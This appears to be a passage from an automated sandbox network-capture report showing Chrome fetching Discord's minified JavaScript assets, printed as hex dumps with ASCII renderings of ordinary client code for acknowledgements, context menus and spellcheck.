                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=iRAiSvtbgHcnTcXmML0TZwPw6wexfCw0vSHWhERq4ZI-1702226715799-0-604800000
                                                                          2023-12-10 16:45:16 UTC965INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 36 32 30 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 31 35 39 39 34 35 63 36 63 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:16 GMTContent-Type: application/javascriptContent-Length: 26202Connection: closeCF-Ray: 8336f51159945c6c-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 38 30 30 38 33 22 5d 2c 7b 32 36 37 33 36 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 2c 61 63 6b 43 68 61 6e 6e 65 6c 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 2c 62 75 6c 6b 41 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 7d 2c 6c 6f 63 61 6c 41 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 7d 2c 65 6e 61 62 6c 65 41 75
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["80083"],{267363:function(e,t,n){"use strict";n.r(t),n.d(t,{ack:function(){return c},ackChannel:function(){return E},bulkAck:function(){return _},localAck:function(){return f},enableAu
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 72 65 6e 74 28 6c 2e 67 75 69 6c 64 5f 69 64 2c 65 29 3b 66 6f 72 28 6c 65 74 20 65 20 69 6e 20 74 29 64 2e 70 75 73 68 28 65 29 7d 29 2c 64 29 29 63 28 65 2c 74 2c 6e 29 7d 28 65 2e 69 64 2c 21 30 2c 21 30 29 3a 65 2e 69 73 46 6f 72 75 6d 4c 69 6b 65 43 68 61 6e 6e 65 6c 28 29 3f 63 28 65 2e 69 64 2c 21 30 2c 21 30 2c 6c 2e 64 65 66 61 75 6c 74 2e 66 72 6f 6d 54 69 6d 65 73 74 61 6d 70 28 44 61 74 65 2e 6e 6f 77 28 29 29 29 3a 63 28 65 2e 69 64 2c 21 30 2c 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 65 29 7b 72 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 42 55 4c 4b 5f 41 43 4b 22 2c 63 68 61 6e 6e 65 6c 73 3a 65 2c 63 6f 6e 74 65 78 74 3a 64 2e 43 55 52 52 45 4e 54 5f 41 50 50 5f 43 4f 4e 54 45 58 54 7d 29 7d 66 75 6e 63
                                                                          Data Ascii: rent(l.guild_id,e);for(let e in t)d.push(e)}),d))c(e,t,n)}(e.id,!0,!0):e.isForumLikeChannel()?c(e.id,!0,!0,l.default.fromTimestamp(Date.now())):c(e.id,!0,!0)}function _(e){r.default.dispatch({type:"BULK_ACK",channels:e,context:d.CURRENT_APP_CONTEXT})}func
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 3f 28 30 2c 75 2e 6a 73 78 29 28 63 2e 64 65 66 61 75 6c 74 2c 7b 77 69 64 74 68 3a 32 34 2c 68 65 69 67 68 74 3a 32 34 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 21 30 7d 29 3a 28 30 2c 75 2e 6a 73 78 29 28 64 2e 64 65 66 61 75 6c 74 2c 7b 77 69 64 74 68 3a 31 38 2c 68 65 69 67 68 74 3a 31 38 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 21 30 7d 29 7d 29 2c 61 2e 69 73 4d 6f 62 69 6c 65 3f 6e 75 6c 6c 3a 28 30 2c 75 2e 6a 73 78 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6f 28 5f 2e 6b 65 79 62 69 6e 64 29 2c 22 61 72 69 61 2d 68 69 64 64 65 6e 22 3a 21 30 2c 63 68 69 6c 64 72 65 6e 3a 6c 7d 29 5d 7d 29 7d 3b 66 2e 64 65 66 61 75 6c 74 50 72 6f 70 73 3d 7b 76 61 72 69 61 6e 74 3a 22 22 7d 2c 66 2e 56 61 72 69 61 6e 74 73 3d 72 3b 76 61 72
                                                                          Data Ascii: ?(0,u.jsx)(c.default,{width:24,height:24,"aria-hidden":!0}):(0,u.jsx)(d.default,{width:18,height:18,"aria-hidden":!0})}),a.isMobile?null:(0,u.jsx)("div",{className:o(_.keybind),"aria-hidden":!0,children:l})]})};f.defaultProps={variant:""},f.Variants=r;var
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 2e 74 2c 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 3a 6e 75 6c 6c 3d 3d 28 6f 3d 69 29 7c 7c 22 22 3d 3d 3d 6f 7c 7c 22 6e 6f 6e 65 22 3d 3d 3d 6f 3f 22 6e 6f 6e 65 22 3a 22 75 72 6c 28 22 2e 63 6f 6e 63 61 74 28 6f 2c 22 29 22 29 7d 7d 72 65 74 75 72 6e 28 30 2c 6c 2e 6a 73 78 29 28 65 2c 7b 73 74 79 6c 65 3a 74 2c 2e 2e 2e 72 7d 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 73 75 70 65 72 28 65 29 2c 74 68 69 73 2e 63 61 63 68 65 64 55 52 4c 73 3d 5b 5d 2c 74 68 69 73 2e 63 61 6e 63 65 6c 6c 65 72 3d 6e 75 6c 6c 3b 6c 65 74 7b 73 74 79 6c 65 3a 74 7d 3d 65 2c 6e 3d 6e 75 6c 6c 21 3d 74 3f 73 28 74 2e 62 61 63 6b 67 72 6f 75 6e 64 49 6d 61 67 65 29 3a 6e 75 6c 6c 3b 74 68 69 73 2e 63 61 63 68 65 64 55 52 4c 73 3d 5b 6e 5d 2c 74 68 69 73 2e 73 74
                                                                          Data Ascii: .t,backgroundImage:null==(o=i)||""===o||"none"===o?"none":"url(".concat(o,")")}}return(0,l.jsx)(e,{style:t,...r})}constructor(e){super(e),this.cachedURLs=[],this.canceller=null;let{style:t}=e,n=null!=t?s(t.backgroundImage):null;this.cachedURLs=[n],this.st
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 68 61 6e 6e 65 6c 2e 69 64 3f 74 5b 65 2e 63 68 61 6e 6e 65 6c 2e 69 64 5d 3a 5b 65 2c 74 5b 65 2e 63 68 61 6e 6e 65 6c 2e 69 64 5d 5d 29 2e 66 6c 61 74 74 65 6e 44 65 65 70 28 29 2e 66 69 6c 74 65 72 28 6e 29 2e 76 61 6c 75 65 28 29 7d 7d 2c 32 39 38 38 37 38 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 3b 76 61 72 20 6c 3d 6e 28 22 33 37 39 38 33 22 29 3b 6e 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 72 3d 6e 28 22 36 36 39 34 39 31 22 29 2c 75 3d 6e 28 22 39 35 36 30 38 39 22 29 2c 69 3d 6e 28 22 37 38 32 33 34 30 22 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 6c 65 74 7b
                                                                          Data Ascii: hannel.id?t[e.channel.id]:[e,t[e.channel.id]]).flattenDeep().filter(n).value()}},298878:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return o}});var l=n("37983");n("884691");var r=n("669491"),u=n("956089"),i=n("782340");function o(e){let{
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 41 43 4b 5f 53 55 43 43 45 53 53 22 2c 70 61 63 6b 3a 69 2e 64 65 66 61 75 6c 74 2e 66 72 6f 6d 53 65 72 76 65 72 28 65 2e 62 6f 64 79 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 7d 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 7b 6c 65 74 7b 70 61 63 6b 49 64 3a 74 7d 3d 65 3b 74 72 79 7b 61 77 61 69 74 20 6c 2e 64 65 66 61 75 6c 74 2e 70 75 74 28 7b 75 72 6c 3a 6f 2e 45 6e 64 70 6f 69 6e 74 73 2e 49 4e 56 45 4e 54 4f 52 59 5f 52 45 4d 4f 56 45 5f 50 41 43 4b 2c 62 6f 64 79 3a 7b 70 61 63 6b 5f 69 64 3a 74 7d 7d 29 2c 72 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 49 4e 56 45 4e 54 4f 52 59 5f 52 45 4d 4f 56 45 5f 50 41 43 4b 5f 53 55 43 43 45 53 53 22 2c 70 61 63 6b 49 64 3a 74 7d 29 7d 63 61 74
                                                                          Data Ascii: ACK_SUCCESS",pack:i.default.fromServer(e.body)})}catch(e){return}}async function d(e){let{packId:t}=e;try{await l.default.put({url:o.Endpoints.INVENTORY_REMOVE_PACK,body:{pack_id:t}}),r.default.dispatch({type:"INVENTORY_REMOVE_PACK_SUCCESS",packId:t})}cat
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 36 32 22 29 2c 66 3d 6e 28 22 34 34 36 30 36 36 22 29 2c 49 3d 6e 28 22 34 39 31 31 31 22 29 2c 43 3d 6e 28 22 39 35 38 37 30 36 22 29 3b 6c 65 74 20 70 3d 28 65 2c 74 2c 6e 29 3d 3e 7b 6c 65 74 20 6c 3d 6e 75 6c 6c 21 3d 6e 3f 65 2e 67 65 74 43 75 73 74 6f 6d 45 6d 6f 6a 69 42 79 49 64 28 6e 29 3a 6e 75 6c 6c 3b 73 77 69 74 63 68 28 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 74 79 70 65 29 7b 63 61 73 65 20 6f 2e 45 6d 6f 6a 69 54 79 70 65 73 2e 47 55 49 4c 44 3a 72 65 74 75 72 6e 7b 65 6d 6f 6a 69 3a 6c 2c 6a 6f 69 6e 65 64 45 6d 6f 6a 69 53 6f 75 72 63 65 47 75 69 6c 64 52 65 63 6f 72 64 3a 74 2e 67 65 74 47 75 69 6c 64 28 6e 75 6c 6c 3d 3d 6c 3f 76 6f 69 64 20 30 3a 6c 2e 67 75 69 6c 64 49 64 29 7d 3b 63 61 73 65 20 6f 2e 45 6d 6f 6a 69 54 79
                                                                          Data Ascii: 62"),f=n("446066"),I=n("49111"),C=n("958706");let p=(e,t,n)=>{let l=null!=n?e.getCustomEmojiById(n):null;switch(null==l?void 0:l.type){case o.EmojiTypes.GUILD:return{emoji:l,joinedEmojiSourceGuildRecord:t.getGuild(null==l?void 0:l.guildId)};case o.EmojiTy
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 29 2c 69 3d 28 30 2c 72 2e 64 65 66 61 75 6c 74 29 28 5b 45 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 45 2e 64 65 66 61 75 6c 74 2e 63 6f 75 6e 74 50 61 63 6b 73 43 6f 6c 6c 65 63 74 65 64 28 29 29 2c 6f 3d 4f 28 7b 65 78 70 72 65 73 73 69 6f 6e 53 6f 75 72 63 65 47 75 69 6c 64 3a 74 7d 29 2c 61 3d 69 3e 3d 28 30 2c 5f 2e 67 65 74 4d 61 78 50 61 63 6b 73 46 6f 72 55 73 65 72 54 79 70 65 29 28 6c 29 3b 72 65 74 75 72 6e 7b 2e 2e 2e 75 2c 63 6f 6c 6c 65 63 74 65 64 50 61 63 6b 3a 6f 2c 6e 75 6d 50 61 63 6b 73 43 6f 6c 6c 65 63 74 65 64 3a 69 2c 68 61 73 52 65 61 63 68 65 64 4d 61 78 50 61 63 6b 73 43 6f 6c 6c 65 63 74 65 64 3a 61 2c 69 73 50 72 65 6d 69 75 6d 3a 6c 7d 7d 2c 4e 3d 65 3d 3e 7b 6c 65 74 20 74 3d 28 30 2c 63 2e 75 73 65 49 6e 76 65 6e 74 6f 72
                                                                          Data Ascii: ),i=(0,r.default)([E.default],()=>E.default.countPacksCollected()),o=O({expressionSourceGuild:t}),a=i>=(0,_.getMaxPacksForUserType)(l);return{...u,collectedPack:o,numPacksCollected:i,hasReachedMaxPacksCollected:a,isPremium:l}},N=e=>{let t=(0,c.useInventor
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 22 75 6e 6b 6e 6f 77 6e 22 2c 74 3d 22 6d 61 79 62 65 47 65 74 50 61 63 6b 73 2c 20 74 72 69 67 67 65 72 20 70 6f 69 6e 74 3a 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 20 22 29 2c 6e 3d 75 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 75 72 72 65 6e 74 55 73 65 72 28 29 3b 69 66 28 6e 75 6c 6c 3d 3d 6e 29 7b 66 28 74 2b 22 6e 6f 20 63 75 72 72 65 6e 74 20 75 73 65 72 22 29 3b 72 65 74 75 72 6e 7d 6c 65 74 20 6c 3d 28 30 2c 61 2e 67 65 74 49 6e 76 65 6e 74 6f 72 79 47 75 69 6c 64 50 61 63 6b 73 55 73 65 72 45 78 70 65 72 69 6d 65 6e 74 43 6f 6e 66 69 67 29 28 7b 75 73 65 72 3a 6e 7d 29 3b 69 66 28 21 6c 2e 76 69 65 77 41 6e 64 55 73 65 45 6e 61 62 6c 65 64 29
                                                                          Data Ascii: &void 0!==arguments[0]?arguments[0]:"unknown",t="maybeGetPacks, trigger point: ".concat(e," "),n=u.default.getCurrentUser();if(null==n){f(t+"no current user");return}let l=(0,a.getInventoryGuildPacksUserExperimentConfig)({user:n});if(!l.viewAndUseEnabled)


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          296192.168.2.550031162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:16 UTC865OUTGET /assets/7105.da032cdf2d68f70cd9db.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=iRAiSvtbgHcnTcXmML0TZwPw6wexfCw0vSHWhERq4ZI-1702226715799-0-604800000
                                                                          2023-12-10 16:45:16 UTC975INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 36 32 38 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 31 62 39 66 38 37 34 33 30 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:16 GMTContent-Type: application/javascriptContent-Length: 16289Connection: closeCF-Ray: 8336f511b9f87430-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:16 UTC394INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 31 30 35 22 5d 2c 7b 32 37 32 30 33 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 63 6c 6f 73 65 43 6f 6e 74 65 78 74 4d 65 6e 75 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 2c 6f 70 65 6e 43 6f 6e 74 65 78 74 4d 65 6e 75 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 6f 70 65 6e 43 6f 6e 74 65 78 74 4d 65 6e 75 4c 61 7a 79 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 7d 29 2c 6e 28 22 35 30 36 30
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["7105"],{272030:function(e,t,n){"use strict";n.r(t),n.d(t,{closeContextMenu:function(){return a},openContextMenu:function(){return o},openContextMenuLazy:function(){return E}}),n("5060
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 6e 74 65 78 74 4d 65 6e 75 3a 65 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 29 7b 7b 6c 65 74 7b 66 6c 75 73 68 53 79 6e 63 3a 74 7d 3d 6e 28 22 38 31 37 37 33 36 22 29 3b 74 28 28 29 3d 3e 7b 69 2e 64 65 66 61 75 6c 74 2e 77 61 69 74 28 28 29 3d 3e 7b 69 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 43 4f 4e 54 45 58 54 5f 4d 45 4e 55 5f 43 4c 4f 53 45 22 7d 29 2e 66 69 6e 61 6c 6c 79 28 65 29 7d 29 7d 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 6e 2c 69 29 7b 76 61 72 20 61 2c 6f 2c 45 3b 69 66 28 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 2c 6e 75 6c 6c 21 3d 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2e 63 6f 6e 74 61 69 6e 73 26 26 21 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2e 63 6f 6e 74
                                                                          Data Ascii: ntextMenu:e})}function a(e){{let{flushSync:t}=n("817736");t(()=>{i.default.wait(()=>{i.default.dispatch({type:"CONTEXT_MENU_CLOSE"}).finally(e)})})}}function o(e,t,n,i){var a,o,E;if(e.stopPropagation(),null!=e.currentTarget.contains&&!e.currentTarget.cont
                                                                          2023-12-10 16:45:16 UTC1254INData Raw: 3a 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 64 43 6f 75 6e 74 2d 2d 2c 30 3d 3d 3d 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 64 43 6f 75 6e 74 26 26 28 74 68 69 73 2e 5f 74 65 72 6d 69 6e 61 74 65 28 29 2c 4f 62 6a 65 63 74 2e 65 6e 74 72 69 65 73 28 74 68 69 73 2e 61 63 74 69 6f 6e 73 29 2e 66 6f 72 45 61 63 68 28 65 3d 3e 7b 6c 65 74 5b 74 2c 6e 5d 3d 65 3b 6c 2e 64 65 66 61 75 6c 74 2e 75 6e 73 75 62 73 63 72 69 62 65 28 74 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 6e 3a 6e 2e 63 61 6c 6c 62 61 63 6b 29 7d 29 29 29 7d 5f 69 6e 69 74 69 61 6c 69 7a 65 28 29 7b 7d 5f 74 65 72 6d 69 6e 61 74 65 28 29 7b 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 7b 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 64 43 6f 75 6e 74 3d 30 2c 74 68
                                                                          Data Ascii: :this.initializedCount--,0===this.initializedCount&&(this._terminate(),Object.entries(this.actions).forEach(e=>{let[t,n]=e;l.default.unsubscribe(t,"function"==typeof n?n:n.callback)})))}_initialize(){}_terminate(){}constructor(){this.initializedCount=0,th
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3b 74 68 69 73 2e 5f 70 72 6f 63 65 73 73 69 6e 67 3d 21 31 2c 65 26 26 74 68 69 73 2e 5f 6d 69 6e 69 6d 75 6d 54 69 6d 65 52 65 6d 61 69 6e 69 6e 67 2b 2b 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 29 7b 74 68 69 73 2e 5f 73 68 6f 75 6c 64 50 72 6f 63 65 73 73 3d 21 31 2c 74 68 69 73 2e 5f 70 72 6f 63 65 73 73 69 6e 67 3d 21 31 2c 74 68 69 73 2e 5f 6d 69 6e 69 6d 75 6d 54 69 6d 65 52 65 6d 61 69 6e 69 6e 67 3d 35 2c 74 68 69 73 2e 5f 6c 61 6e 67 75 61 67 65 3d 65 2c 74 68 69 73 2e 5f 6c 61 6e 67 75 61 67 65 48 69 6e 74 3d 65 2c 74 68 69 73 2e 5f 6f 6e 43 68 61 6e 67 65 3d 74
                                                                          Data Ascii: t e=arguments.length>0&&void 0!==arguments[0]&&arguments[0];this._processing=!1,e&&this._minimumTimeRemaining++}constructor(e,t){this._shouldProcess=!1,this._processing=!1,this._minimumTimeRemaining=5,this._language=e,this._languageHint=e,this._onChange=t
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 5b 69 5d 3d 65 2e 73 70 6c 69 74 28 22 2d 22 29 3b 74 5b 69 5d 3d 6e 75 6c 6c 21 3d 3d 28 6e 3d 74 5b 69 5d 29 26 26 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 3a 65 7d 29 2c 74 7d 69 73 4d 69 73 73 70 65 6c 6c 65 64 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 22 21 3d 3d 74 68 69 73 2e 6d 69 73 73 70 65 6c 6c 65 64 57 6f 72 64 26 26 65 3d 3d 3d 74 68 69 73 2e 6d 69 73 73 70 65 6c 6c 65 64 57 6f 72 64 7d 67 65 74 43 6f 72 72 65 63 74 69 6f 6e 73 46 6f 72 4d 69 73 73 70 65 6c 6c 69 6e 67 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 4d 69 73 73 70 65 6c 6c 65 64 28 65 2c 74 29 3f 74 68 69 73 2e 63 6f 72 72 65 63 74 69 6f 6e 73 3a 5b 5d 7d 72 65 70 6c 61 63 65 4d 69 73 73 70 65 6c 6c 69 6e 67 28 65 29 7b 49 2e 72 65 70 6c 61 63 65 4d 69 73 73 70 65 6c 6c
                                                                          Data Ascii: [i]=e.split("-");t[i]=null!==(n=t[i])&&void 0!==n?n:e}),t}isMisspelled(e,t){return""!==this.misspelledWord&&e===this.misspelledWord}getCorrectionsForMisspelling(e,t){return this.isMisspelled(e,t)?this.corrections:[]}replaceMisspelling(e){I.replaceMisspell
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 22 2c 61 6b 3a 22 61 6b 2d 47 48 22 2c 61 6d 3a 22 61 6d 2d 45 54 22 2c 61 6e 3a 22 61 6e 2d 45 53 22 2c 61 72 3a 22 61 72 2d 4d 41 22 2c 61 73 3a 22 61 73 2d 49 4e 22 2c 61 79 3a 22 61 79 2d 50 45 22 2c 61 7a 3a 22 61 7a 2d 41 5a 22 2c 62 65 3a 22 62 65 2d 42 59 22 2c 62 67 3a 22 62 67 2d 42 47 22 2c 62 69 3a 22 62 69 2d 54 56 22 2c 62 6e 3a 22 62 6e 2d 42 44 22 2c 62 6f 3a 22 62 6f 2d 43 4e 22 2c 62 72 3a 22 62 72 2d 46 52 22 2c 62 73 3a 22 62 73 2d 42 41 22 2c 63 61 3a 22 63 61 2d 45 53 22 2c 63 65 3a 22 63 65 2d 52 55 22 2c 63 73 3a 22 63 73 2d 43 5a 22 2c 63 76 3a 22 63 76 2d 52 55 22 2c 63 79 3a 22 63 79 2d 47 42 22 2c 64 61 3a 22 64 61 2d 44 4b 22 2c 64 65 3a 22 64 65 2d 44 45 22 2c 64 76 3a 22 64 76 2d 4d 56 22 2c 64 7a 3a 22 64 7a 2d 42 54 22 2c
                                                                          Data Ascii: ",ak:"ak-GH",am:"am-ET",an:"an-ES",ar:"ar-MA",as:"as-IN",ay:"ay-PE",az:"az-AZ",be:"be-BY",bg:"bg-BG",bi:"bi-TV",bn:"bn-BD",bo:"bo-CN",br:"br-FR",bs:"bs-BA",ca:"ca-ES",ce:"ce-RU",cs:"cs-CZ",cv:"cv-RU",cy:"cy-GB",da:"da-DK",de:"de-DE",dv:"dv-MV",dz:"dz-BT",
